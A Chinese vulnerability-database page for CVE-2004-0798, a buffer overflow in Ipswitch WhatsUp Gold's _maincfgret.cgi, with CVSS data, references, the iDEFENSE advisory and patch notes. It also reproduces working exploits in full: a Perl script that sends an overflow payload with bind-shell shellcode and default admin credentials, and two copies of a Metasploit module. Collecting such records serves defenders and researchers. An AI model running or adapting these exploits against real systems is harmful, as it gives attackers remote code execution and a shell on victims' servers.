CVE-2004-0798
CVSS7.5
发布时间 :2004-10-20 00:00:00
修订时间 :2008-09-05 16:39:25
NMCOEPS    

[原文]Buffer overflow in the _maincfgret.cgi script for Ipswitch WhatsUp Gold before 8.03 Hotfix 1 allows remote attackers to execute arbitrary code via a long instancename parameter.


[CNNVD]Ipswitch WhatsUp Gold远程缓冲区溢出漏洞(CNNVD-200410-069)

        
        Ipswitch WhatsUp Gold是一款基于Windows的网络监视应用程序。
        WhatsUp Gold在处理畸形参数的用户请求时存在缓冲区漏洞,远程攻击者可以利用这个漏洞控制服务器。
        WhatsUp Gold的_maincfgret.cgi程序没有正确检查过滤用户提交的instancename参数,远程攻击者可能POST超长的数据导致缓冲区溢出,执行任意指令。
        <**>

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:ipswitch:whatsup_gold:8.01Ipswitch WhatsUp Gold 8.01
cpe:/a:ipswitch:whatsup_gold:7.0Ipswitch WhatsUp Gold 7.0
cpe:/a:ipswitch:whatsup_gold:8.03Ipswitch WhatsUp Gold 8.03
cpe:/a:ipswitch:whatsup_gold:8.0Ipswitch WhatsUp Gold 8.0
cpe:/a:ipswitch:whatsup_gold:7.03Ipswitch WhatsUp Gold 7.03
cpe:/a:ipswitch:whatsup_gold:7.04Ipswitch WhatsUp Gold 7.04

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0798
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0798
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200410-069
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/17111
(VENDOR_ADVISORY)  XF  whatsup-maincfgret-bo(17111)
http://www.ipswitch.com/Support/WhatsUp/patch-upgrades.html
(UNKNOWN)  MISC  http://www.ipswitch.com/Support/WhatsUp/patch-upgrades.html
http://www.idefense.com/application/poi/display?type=vulnerabilities
(UNKNOWN)  IDEFENSE  20040825 Ipswitch WhatsUp Gold Remote Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/11043
(UNKNOWN)  BID  11043

- 漏洞信息

Ipswitch WhatsUp Gold远程缓冲区溢出漏洞
高危 边界条件错误
2004-10-20 00:00:00 2005-10-20 00:00:00
远程  
        
        Ipswitch WhatsUp Gold是一款基于Windows的网络监视应用程序。
        WhatsUp Gold在处理畸形参数的用户请求时存在缓冲区漏洞,远程攻击者可以利用这个漏洞控制服务器。
        WhatsUp Gold的_maincfgret.cgi程序没有正确检查过滤用户提交的instancename参数,远程攻击者可能POST超长的数据导致缓冲区溢出,执行任意指令。
        <**>

- 公告与补丁

        厂商补丁:
        Ipswitch
        --------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        
        http://www.ipswitch.com/

- 漏洞信息 (566)

IPSwitch WhatsUp Gold 8.03 Remote Buffer Overflow Exploit (EDBID:566)
windows remote
2004-10-04 Verified
80 LoWNOISE
N/A [点击下载]
#!/usr/bin/perl 
# [LoWNOISE] NotmuchG.pl v.1.5
# ================================================
# IPSWITCH WhatsUp Gold ver8.03 Remote Buffer Overflow Exploit
# ================================================
#
# Exploit by ET LoWNOISE Colombia 
# et(at)cyberspace.org
# Oct/2004
# 
# Tested on WIN2K SP4 
#
# The exploit takes control by overwriting the pointer of a Structured
Exception Handler, 
# installed by WhatsUP and points to a routine that handles exceptions.
# (http://www.thc.org/papers/Practical-SEH-exploitation.pdf Johnny
Cyberpunk THC)
#
# The overflow string has to be around 4080 in length to generate an
exception that can
# be manipulated by changing the SEH pointer (ret [815]).
# 
#
# Bug Discovered by 
# iDEFENSE Security Advisory 08.25.04
# http://www.idefense.com/application/poi/display?type=vulnerabilities
#
# Greetz to the midget, the m3 and los parces , the seltiks, p0ch1n,
Ritt3r,Mav, f4lc0n.. 

use strict; 
use IO::Socket::INET;

usage() unless (@ARGV == 2); 

my $host = shift(@ARGV); 
my $port = shift(@ARGV); 

# Bind shellcode port 28876 (HDM, metasploit.org)
my $shellcode =
"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52". 
"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1". 
"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a". 
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01". 
"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b". 
"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32". 
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff". 
"\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe". 
"\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50". 
"\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff". 
"\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89". 
"\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff". 
"\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x6a". 
"\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x24\xff\xff\xff\x31\xdb". 
"\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x50\x50\x50\x53\x53\x31\xc0". 
"\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53\x53\x53\x53\x6a\x44". 
"\x89\xe6\x50\x55\x53\x53\x53\x53\x54\x56\x53\x53\x53\x43\x53\x4b". 
"\x53\x53\x51\x53\x89\xfd\xbb\x21\xd0\x05\xd0\xe8\xe2\xfe\xff\xff". 
"\x31\xc0\x48\x8b\x44\x24\x04\xbb\x43\xcb\x8d\x5f\xe8\xd1\xfe\xff". 
"\xff\x5d\x5d\x5d\xbb\x12\x6b\x6d\xd0\xe8\xc4\xfe\xff\xff\x31\xc0". 
"\x50\x89\xfd\xbb\x69\x1d\x42\x3a\xe8\xb5\xfe\xff\xff"; 

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,
PeerPort=>$port); 
$socket or die "Cannot connect to the host.\n"; 

$socket->autoflush(1); 

print $socket "POST /_maincfgret.cgi HTTP/1.0\r\n"; 
print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel,
application/msword, application/x-shockwave-flash,
application/vnd.citrix.AdvGWClient-2_2, */*\r\n"; 
print $socket "Referer:
http://127.0.0.1/NotifyAction.asp?action=AddType&instance=Beeper&end=end\r\n"; 
print $socket "Accept-Language: en-us\r\nContent-Type:
application/x-www-form-urlencoded\r\nConnection: Keep-Alive\r\n";
print $socket "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1; T312461; .NET CLR 1.1.4322)\r\n";
print $socket "Host: 127.0.0.1\r\nContent-Length: ";
my $cmd ="page=notify&origname=&action=return&type=Beeper&instancename=";


#[-------815-------------] [ret] [-------------4080---------]
#[A.....811...A][jmp] [ret] [nops][shc][E.......E ]

$cmd .= "A"x811; #815 -4 
$cmd .= "\xeb\x06\x90\x90"; #jumper <eb + 06> <garbage> jmp to shellcode


#$cmd .= "\xfe\x63\xa1\x71"; #winXP SP1 ws2help.dll
$cmd .= "\xc4\x2a\x02\x75"; #win2k sp0-sp4 ws2help.dll

#$cmd .= "LOWNOISE"; #garbage :D 
$cmd .= "\x90"x2080;
$cmd .= $shellcode;
$cmd .= "E"x(2000-length($shellcode)); #mas basura

$cmd .= "&beepernumber=&upcode=0*&downcode=9*&trapcode=6*&end=end";
print $socket length($cmd)."\r\nPragma: no-cache\r\nAuthorization: Basic
YWRtaW46YWRtaW4=\r\n\r\n";
print $socket $cmd."\r\n";

close($socket); 
exit(0); 

sub usage 
{ 
print "\n[LoWNOISE] IPSWITCH WhatsUp Gold 8.03 Remote fr33 exploit\n";
print "===================================================\n";
print "\nUsage: NotmuchG.pl [host] [port]\n"; 
print "[host] Target host\n[port] WhatsUp webserver port\n\n"; 
print "\n Shell on tcp port 28876.\n\n"; 
print "ET LoWNOISE 2004\n";
exit(1); 
}


# milw0rm.com [2004-10-04]
		

- 漏洞信息 (16787)

Ipswitch WhatsUp Gold 8.03 Buffer Overflow (EDBID:16787)
windows remote
2010-07-14 Verified
0 metasploit
N/A [点击下载]
##
# $Id: ipswitch_wug_maincfgret.rb 9820 2010-07-14 13:59:38Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	# [*] x.x.x.x WhatsUp_Gold/8.0 ( 401-Basic realm="WhatsUp Gold" )
	HttpFingerprint = { :pattern => [ /WhatsUp/ ] }

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Ipswitch WhatsUp Gold 8.03 Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By
				posting a long string for the value of 'instancename' in the _maincfgret.cgi
				script an attacker can overflow a buffer and execute arbitrary code on the system.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9820 $',
			'References'     =>
				[
					['CVE', '2004-0798'],
					['OSVDB', '9177'],
					['BID', '11043'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'WhatsUP Gold 8.03 Universal', { 'Ret' => 0x6032e743 } ], # whatsup.dll
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Aug 25 2004'))

		register_options(
			[
				Opt::RPORT(80),
				OptString.new('HTTPUSER', [ false, 'The username to authenticate as', 'admin']),
				OptString.new('HTTPPASS', [ false, 'The password to authenticate as', 'admin']),
			], self.class )
	end

	def exploit
		c = connect

		num = rand(65535).to_s
		user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}"

		req   = "page=notify&origname=&action=return&type=Beeper&instancename="
		req  << rand_text_alpha_upper(811, payload_badchars) + "\xeb\x06"
		req  << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded
		req  << "&beepernumber=&upcode=" + num + "*&downcode="+ num + "*&trapcode=" + num + "*&end=end"

		print_status("Trying target %s..." % target.name)
		res = send_request_cgi({
			'uri'          => '/_maincfgret.cgi',
			'method'       => 'POST',
			'content-type' => 'application/x-www-form-urlencoded',
			'data'         => req,
			'headers'      =>
			{
				'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"
			}
		}, 5)

		handler
	end

end
		

- 漏洞信息 (F83076)

Ipswitch WhatsUp Gold 8.03 Buffer Overflow (PacketStormID:F83076)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,arbitrary,cgi
CVE-2004-0798
[点击下载]

This Metasploit module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By posting a long string for the value of 'instancename' in the _maincfgret.cgi script an attacker can overflow a buffer and execute arbitrary code on the system.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Ipswitch WhatsUp Gold 8.03 Buffer Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By
				posting a long string for the value of 'instancename' in the _maincfgret.cgi 
				script an attacker can overflow a buffer and execute arbitrary code on the system.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2004-0798'],
					['OSVDB', '9177'],
					['BID', '11043'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'WhatsUP Gold 8.03 Universal', { 'Ret' => 0x6032e743 } ], # whatsup.dll
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Aug 25 2004'))
			
			register_options( [ 
						Opt::RPORT(80),
						OptString.new('HTTPUSER', [ false, 'The username to authenticate as', 'admin']),
						OptString.new('HTTPPASS', [ false, 'The password to authenticate as', 'admin']), 
						], self.class )

	end

	def exploit
		c = connect

		num = rand(65535).to_s 
		user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}" 
		
		req   = "page=notify&origname=&action=return&type=Beeper&instancename="
		req  << rand_text_alpha_upper(811, payload_badchars) + "\xeb\x06"
		req  << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded
		req  << "&beepernumber=&upcode=" + num + "*&downcode="+ num + "*&trapcode=" + num + "*&end=end"

		print_status("Trying target %s..." % target.name)
		res = send_request_cgi({
			'uri'          => '/_maincfgret.cgi',
			'method'       => 'POST',
			'content-type' => 'application/x-www-form-urlencoded',
			'data'         => req,
			'headers'      => 
			{
				'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"
			}
		}, 5)
	
		handler
	end

end
    

- 漏洞信息 (F34168)

iDEFENSE Security Advisory 2004-08-25.t (PacketStormID:F34168)
2004-08-26 00:00:00
iDefense Labs  idefense.com
advisory,remote,web,overflow,arbitrary,cgi
CVE-2004-0798
[点击下载]

iDEFENSE Security Advisory 08.25.04 - Remote exploitation of a buffer overflow vulnerability in Ipswitch Inc.'s WhatsUp Gold allows attackers to execute arbitrary code under the privileges of the user that instantiated the application. The problem specifically exists in the _maincfgret.cgi script accessible through the web server installed by WhatsUp Gold. By posting a long string for the value of 'instancename', a buffer overflow occurs allowing an attacker to redirect the flow of control and eventually execute arbitrary code. Fixed in version 8.03 Hotfix 1.

Ipswitch WhatsUp Gold Remote Buffer Overflow Vulnerability

iDEFENSE Security Advisory 08.25.04
http://www.idefense.com/application/poi/display?type=vulnerabilities
August 25, 2004

I. BACKGROUND

Ipswitch WhatsUp Gold is a Microsoft Windows based network monitoring
application. More information is available at:

    http://www.Ipswitch.com/products/whatsup/index.html

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Ipswitch
Inc.'s WhatsUp Gold allows attackers to execute arbitrary code under the
privileges of the user that instantiated the application.

The problem specifically exists in the _maincfgret.cgi script accessible
through the web server installed by WhatsUp Gold. By posting a long
string for the value of 'instancename', a buffer overflow occurs
allowing an attacker to redirect the flow of control and eventually
execute arbitrary code.

III. ANALYSIS

Successful exploitation allows remote attackers to execute arbitrary
code under the privileges of the user that instantiated the application.
The WhatsUp Gold web server is not enabled by default.

IV. DETECTION

iDEFENSE has confirmed the existence of this vulnerability against
WhatsUp Gold version 8.03. iDEFENSE has confirmed that the latest
version of WhatsUp Gold, version 8.03 Hotfix 1, is not vulnerable.

V. WORKAROUND

Disable the WhatsUp Gold web server if it is not required.

VI. VENDOR RESPONSE

The buffer overflow is repaired in WhatsUp Gold, version 8.03 Hotfix 1.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2004-0798 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org),
which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

08/12/2004   Initial vendor notification
08/12/2004   iDEFENSE clients notified
08/12/2004   Initial vendor response
08/25/2004   Public disclosure

IX. CREDIT

The discoverer wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

X. LEGAL NOTICES

Copyright (c) 2004 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
    

- 漏洞信息

9177
Ipswitch WhatsUp Gold _maincfgret.cgi Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public, Exploit Commercial

- 漏洞描述

A remote overflow exists in WhatsUp Gold. The _maincfgret.cgi script fails to properly bounds check the instancename variable resulting in a buffer overflow. With a specially crafted request, an attacker can potentially execute arbitrary code resulting in a loss of integrity.

- 时间线

2004-08-25 2004-08-12
2004-10-03 Unknow

- 解决方案

Upgrade to version 8.03 Hotfix 1 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): disable the web interface

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Ipswitch WhatsUp Gold Remote Buffer Overflow Vulnerability
Boundary Condition Error 11043
Yes No
2004-08-25 12:00:00 2008-02-01 07:07:00
The individual responsible for discovery of this issue is currently unknown.

- 受影响的程序版本

Ipswitch WhatsUp Gold 8.0 3
Ipswitch WhatsUp Gold 8.0 1
Ipswitch WhatsUp Gold 8.0
Ipswitch WhatsUp Gold 7.0 4
Ipswitch WhatsUp Gold 7.0 3
Ipswitch WhatsUp Gold 7.0
Ipswitch WhatsUp Gold 8.0 3 hotfix 1

- 不受影响的程序版本

Ipswitch WhatsUp Gold 8.0 3 hotfix 1

- 漏洞讨论

Ipswitch WhatsUp Gold is affected by a remote buffer-overflow vulnerability because the application fails to properly validate user-supplied string lengths before copying them into static process buffers.

An attacker might leverage this issue to execute arbitrary code on the affected computer with the privileges of the user that started the vulnerable application.

- 漏洞利用

The following exploit code is available as a module for the Metasploit Framework:

- 解决方案

The vendor has released an upgrade dealing with this issue.


Ipswitch WhatsUp Gold 7.0 4

Ipswitch WhatsUp Gold 7.0 3

Ipswitch WhatsUp Gold 7.0

Ipswitch WhatsUp Gold 8.0

Ipswitch WhatsUp Gold 8.0 1

Ipswitch WhatsUp Gold 8.0 3

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站